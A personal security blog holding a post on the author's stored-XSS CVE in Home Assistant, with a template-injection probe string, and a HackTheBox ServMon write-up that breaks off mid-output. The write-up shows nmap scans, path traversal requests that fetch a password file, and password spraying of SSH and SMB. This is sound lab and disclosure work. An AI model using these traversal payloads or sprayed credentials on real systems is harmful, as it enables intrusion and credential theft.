Robin Lunde's random blog

CVE-2025-62172

Robin Lunde — Tue, 14 Oct 2025 19:24:13 GMT

Well, it's been a while...

This time, I am here to talk about my first accredited CVE!

Personal Thoughts

First, let's begin with a meme:

Report vulnerability - get CVE

I have been doing bug bounty and security research for a while now, reporting issues and doing responsible disclosures to a variety of companies. It feels really good to finally get accredited with a CVE to show for it.

A lot of the time it feels like wasted effort — you send reports and get no reply. Sometimes you get a quick response or a small reward, which feels good and fuels further work. This time, the coveted CVE was the reward :)

Another long-standing goal of mine was to contribute to open-source software that I use. I'm very happy (and lucky) that I could do this while working on a hobby I enjoy. It's a huge bonus to help secure users worldwide.

I would like to thank the Home Assistant team for doing a great job, both in general and when responding to this report. Thank you!

How do I look for these types of issues?

Now, for what most of you really came for: the tips & tricks.

When going about my daily life, I try to do my best to contribute to securing society and the services I use (and the other users of those services).

One simple technique I use is to plant harmless, easily-observable payloads in places where user-controlled content is rendered. They act like little tripwires that reveal when template engines, renderers, or sanitizers behave unexpectedly. An example is the payload in the report for the CVE:

~~SomeText {{7*7}} ${6*6} #{5*5} @{4*4}~~

~~Possible observable results:~~

If a templating engine or server side rendering evaluates expressions inside certain delimiters, you might see the expressions replaced by their calculated result.
Example:

~~SomeText {{7*7}} ${6*6} #{5*5} 16~~

(Here @{4*4} became 16.)
or HTML-tags are not properly escaped and the whole text gets strikethrough (as seen in the report) and example below:
~~SomeText {{7*7}} ${6*6} #{5*5} @{4*4}~~
(Here ~~became interpreted as a strikethrough tag, indicating HTML injection)~~
Then, whenever I use the services, get emails or interact with it in my daily life, I just observe if any of these states change. It is like second nature to me at this point. This is also a technique I use in bug bounty and at my daily job. If you have permission to test, like in bug bounty and at work, you can also use blind execution payloads (check out ezXSS for XSS-based out of band (blind) testing and interactsh for a general-purpose one) in the same way.
~~Technical details~~
~~Here is the advisory:~~
Stored XSS in graph tooltip from entity name
### SummaryAn authenticated party can add a malicious name to the Energy entity, allowing for Cross-Site Scripting attacks against anyone who can see the Energy dashboard, when they hover over an...
GitHubhome-assistant
CVE-2025-62172 Advisory
~~2. It seems like GitHub & NVD has set the CVSS to 5.3, which I believe to be wrong. This is my fault, as I did not initially add a CVSS-score.~~
~~As such, here is my suggested CVSS rating for this issue:~~
~~CVSS 3.1 Vector: AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:H/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H~~
NVD - CVSS v3 Calculator
Xfacebooklinkedinyoutube
Proposed CVSS for CVE-2025-62172
A short description of why is: Home Assistant, at the time of the report, does not have any security mechanisms in place other than user management. That means that any valid user in the system is equivalent to an admin user. Quote from https://www.home-assistant.io/security/#non-qualifying-vulnerabilities:
~~Non qualifying vulnerabilities:~~

Privilege escalation attacks for logged in users. Home Assistant assumes every user is trusted and does not enforce user privileges. It assumes every logged in user has the same access as an owner account (more information).

In addition, user access to Home Assistant instances results in Remote Code Execution by design. An simple example:
Be user
Install SSH-plugin
Shell access to server
There are many other ways to achieve this, and it is just due to how the software is supposed to function. The result is that anyone with access to the server, in effect can execute code on the underlying host.
More information about Home Assistant and its approach to security can be found here!
Thank you for reading!

HackTheBox - ServMon

Robin Lunde — Sat, 20 Jun 2020 23:13:00 GMT

ServMon
This is a writeup for the HackTheBox machine ServMon. ServMon retired 20/06/2020 at 19.00 UTC.
It is an easy Windows machine, and largely relies on CVE's for exploitation.
Motivation
My motivation for doing this machine was to challenge myself to do it before it got retired. I had about 8 hours or so when I started.
Summary:
Anonymous FTP reveals location of password file
NVMS-1000 Path Traversal allows retrieval of above discovered password file (CVE)
Spraying found credentials targeted to known users gives valid SSH session (User pwn'd)
Looking at previously found NSClient++ page's configuration file reveals the password
Put a netcat binary or prepare a reverse shell somehow (script execution is restricted and the box runs AV)
NSClient++ is vulnerable to privilege escalation by scheduling a task (Exploit)
Get root shell
Detailed walkthrough
NMAP
In the words of @ippsec
"As always we start off with a NMAP"
(Sidenote: Thanks for producing amazing content, I would not be able to get this box without your guidance!)
NMAP "quick" scan (top 1000 ports, as is by default - ref)
... The simple command nmap scans the most commonly used 1,000 TCP ports on the host ...
$ sudo nmap -sC -sV -O 10.10.10.184 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 10:33 JST Nmap scan report for 10.10.10.184 Host is up (0.15s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PMUsers | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | | | | | | | | | | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open tcpwrapped 6699/tcp open napster? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | iday | Sat:Saturday | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.80%I=7%D=6/20%Time=5EECDAED%P=x86_64-pc-linux-gnu%r(NULL SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x SF:20\r\n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\ SF:x20\x20\x20\r\n\x20\x20\x20\x20\x20 SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2 SF:0\x20\x20\x20\r\n\r\n\r\n\r\n\r\n") SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\ SF:n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\x20\x SF:20\x20\r\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20 SF:\x20\x20\r\n\r\n\r\n\r\n\r\n")%r(RT SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n SF:\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\x20\x20\x2 SF:0\r\n\x20\x20\x20\x20\x20\x20\x20\x SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\ SF:x20\r\n\r\n\r\n\r\n\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=6/20%Time=5EECDAF6%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\x12 SF:\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\x18\xc7\x08\x12" SF:)%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDo SF:cument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCo SF:ntent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36, SF:"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20fo SF:und")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\ SF:nDocument\x20not\x20found"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=6/20%OT=21%CT=1%CU=42752%PV=Y%DS=2%DC=I%G=Y%TM=5EECDB8 OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%CI=I%TS=U)SEQ(SP=104%GC OS:D=1%ISR=10B%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NN OS:S%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W OS:6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S= OS:O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y% OS:DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T6(R=Y%DF OS:=Y%T=80%W=0%S=O%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O= OS:%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G OS:)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -5s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-19T15:36:16 |_ start_date: N/A OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 166.74 seconds
Quick scan
NMAP all ports
$ sudo nmap -p- -T5 10.10.10.184 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 10:54 JST Warning: 10.10.10.184 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.10.184 Host is up (0.17s latency). Not shown: 65517 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5040/tcp open unknown 5666/tcp open nrpe 6063/tcp open x11 6699/tcp open napster 8443/tcp open https-alt 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 639.38 seconds
All ports scan
NMAP targeted scan
$ sudo nmap -sC -sV -O -p 21,22,80,135,139,445,5040,5666,6063,6699,8443,49664,49665,49666,49667,49668,49669,49670 -T5 10.10.10.184 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 11:42 JST Nmap scan report for SERVMON (10.10.10.184) Host is up (0.17s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PMUsers | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | | | | | | | | | | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 5666/tcp open tcpwrapped 6063/tcp open x11? 6699/tcp open napster? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.80%I=7%D=6/20%Time=5EED6980%P=x86_64-pc-linux-gnu%r(NULL SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x SF:20\r\n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\ SF:x20\x20\x20\r\n\x20\x20\x20\x20\x20 SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2 SF:0\x20\x20\x20\r\n\r\n\r\n\r\n\r\n") SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\ SF:n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\x20\x SF:20\x20\r\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20 SF:\x20\x20\r\n\r\n\r\n\r\n\r\n")%r(RT SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n SF:\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20\r\n\x20\x20\x20\x2 SF:0\r\n\x20\x20\x20\x20\x20\x20\x20\x SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\ SF:x20\r\n\r\n\r\n\r\n\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=6/20%Time=5EED6989%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\ SF:x18\xcb\x15\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length: SF:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1 SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r SF:(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocum SF:ent\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Leng SF:th:\x2018\r\n\r\nDocument\x20not\x20found"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Longhorn (95%), Microsoft Windows 10 1511 (93%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%), Microsoft Windows 8 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 7 Enterprise SP1 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -7s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-20T01:45:00 |_ start_date: N/A OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 200.09 seconds
Targeted scan
Anonymous FTP
FTP access - Note that password field can be anything
The easiest and quickest way to continue from the above results is the anonymous FTP enumeration. To download the files to your current local directory, simply use:
# get $ get Confidential.txt
FTP commands
By accessing the FTP share, we get access to the following data:
Nadine/Confidential.txt
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
Confidential.txt
Nathan/Notes to do.txt
1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint
Notes to do.txt
From the above notes, it seems quite clear that we can somehow reach the Passwords.txt file on Nathan's desktop.
NVMS-1000 Path Traversal
From the NMAP scan, we also know there are webservices running on this server. Webservices are usually vulnerable, so I decided to enumerate those next.
Port 80
On port 80, we have NVMS-1000
After a quick google search, we find CVE-2019-20085. This Path Traversal vulnerability is a perfect candidate for accessing the file above, but let us not get ahead of ourselves.
Port 8443
On 8443 we have NSClient++
After quickly checking the page for any issues, I did a search to see if I could find any issues with this software. This software also had some juicy exploits, but since they were authenticated exploits, I decided to focus on port 80 first.
Searchsploit results
After reading the exploit details, it seems like a trivial exploit. I fired up burp, intercepted a request to the base page, and added the basic payload as given in the PoC.
I am always surprised when PoCs just work!
It worked perfectly...! Afterwards, I had to play around a little until I found a payload that gave me the file with the passwords. Note: I was stuck for a few minutes due to following the PoC and including Windows in the payload (See below). After trying and failing for a bit, I finally got it.
# Wrong path GET /Pages/login.htm/../../../../../../../../../../Windows/Users/Nathan/Desktop/Passwords.txt HTTP/1.1 # Right path GET /Pages/login.htm/../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Payloads
Aaand, we get all the passwords!
OK, time to move on!
Password spray SSH
After finding the credentials, I decided to spray SSH and Samba for valid logins. I used the previously known usernames for this. I considered trying the credentials on the NSClient++ service, but decided that would be my next step if SSH and Samba failed.
SSH
Enumerating SSH credentials
Samba
Enumerating samba credentials
Samba shares available
As you can see, there are hits on both. I tested quickly, and both were valid. I personally prefer SSH, so that's what I continued with, knowing I had Samba as a fallback, if needed.
After logging in through SSH, these were the user folders we had access to:
$ tree . > out.txt Folder PATH listing Volume serial number is 728C-D22C C:\USERS +---Administrator +---Nadine | | out.txt | | | +---3D Objects | +---Contacts | +---Desktop | | user.txt | | | +---Documents | +---Downloads | +---Favorites | | | Bing.url | | | | | \---Links | +---Links | | Desktop.lnk | | Downloads.lnk | | | +---Music | +---OneDrive | +---Pictures | | \---Camera Roll | +---Saved Games | +---Searches | | winrt--{S-1-5-21-3877449121-2587550681-992675040-1002}-.searchconnector-ms | | | \---Videos +---Nathan \---Public
Tree of User folders on the box
Wooo, we got user!
Shell access as Nadine
User done!
Privilege Escalation
At this point, it was time to think of how to get to root. I started JAWS in the background, so I had some recon going. We still hadn't dealt with NSClient++, so I wanted to dig into that while my script was running.
For the curious, here is the output of JAWS. Not much interesting!
Running J.A.W.S. Enumeration - Gathering User Information - Gathering Processes, Services and Scheduled Tasks - Gathering Installed Software - Gathering File System Information - Looking for Simple Priv Esc Methods ############################################################ ## J.A.W.S. (Just Another Windows Enum Script) ## ## ## ## https://github.com/411Hall/JAWS ## ## ## ############################################################ Windows Version: Architecture: AMD64 Hostname: SERVMON Current User: nadine Current Time\Date: 06/20/2020 04:03:36 ----------------------------------------------------------- Users ----------------------------------------------------------- ---------- Username: Administrator Groups: Administrators ---------- Username: DefaultAccount Groups: System Managed Accounts Group ---------- Username: Guest Groups: Guests ---------- Username: Nadine Groups: Users ---------- Username: Nathan Groups: Users ---------- Username: sshd Groups: ---------- Username: WDAGUtilityAccount Groups: ----------------------------------------------------------- Network Information ----------------------------------------------------------- Windows IP Configuration Ethernet adapter Ethernet0 2: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::405e:6db1:cf1b:2fec Temporary IPv6 Address. . . . . . : dead:beef::8070:2c31:c321:65d0 Link-local IPv6 Address . . . . . : fe80::405e:6db1:cf1b:2fec%3 IPv4 Address. . . . . . . . . . . : 10.10.10.184 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:12d6%3 10.10.10.2 ----------------------------------------------------------- Arp ----------------------------------------------------------- Interface: 10.10.10.184 --- 0x3 Internet Address Physical Address Type 10.10.10.2 00-50-56-b9-12-d6 dynamic 10.10.10.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 234.55.55.55 01-00-5e-37-37-37 static 239.255.255.250 01-00-5e-7f-ff-fa static ----------------------------------------------------------- NetStat ----------------------------------------------------------- Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 2644 TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 2784 TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 3100 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 872 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 4880 TCP 0.0.0.0:5666 0.0.0.0:0 LISTENING 3380 TCP 0.0.0.0:5666 0.0.0.0:0 LISTENING 3380 TCP 0.0.0.0:6063 0.0.0.0:0 LISTENING 3100 TCP 0.0.0.0:6699 0.0.0.0:0 LISTENING 3100 TCP 0.0.0.0:8443 0.0.0.0:0 LISTENING 3380 TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 628 TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 484 TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1120 TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1528 TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2092 TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 620 TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 2480 TCP 10.10.10.184:22 10.10.14.49:39144 ESTABLISHED 2784 TCP 10.10.10.184:22 10.10.14.49:42816 ESTABLISHED 2784 TCP 10.10.10.184:139 0.0.0.0:0 LISTENING 4 TCP 10.10.10.184:5040 10.10.14.49:320 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60126 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60206 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60266 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60298 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60324 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60390 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60430 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60462 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60502 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60526 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60548 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60556 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60566 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60578 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60586 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60594 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60606 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60616 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60622 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60634 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60640 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60648 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60654 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60660 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60662 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60664 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60666 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60668 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60670 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60724 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60838 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.49:60840 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:416 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48250 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48352 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48394 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48428 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48486 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48538 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48562 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48584 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48630 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48650 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48670 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48674 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48678 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48684 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48690 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48694 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48698 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48704 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48708 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48714 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48716 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48718 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48720 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48722 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48724 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48726 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48728 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48730 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48732 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48816 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48922 CLOSE_WAIT 4880 TCP 10.10.10.184:5040 10.10.14.54:48924 CLOSE_WAIT 4880 TCP 10.10.10.184:6699 10.10.14.49:47420 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.49:47454 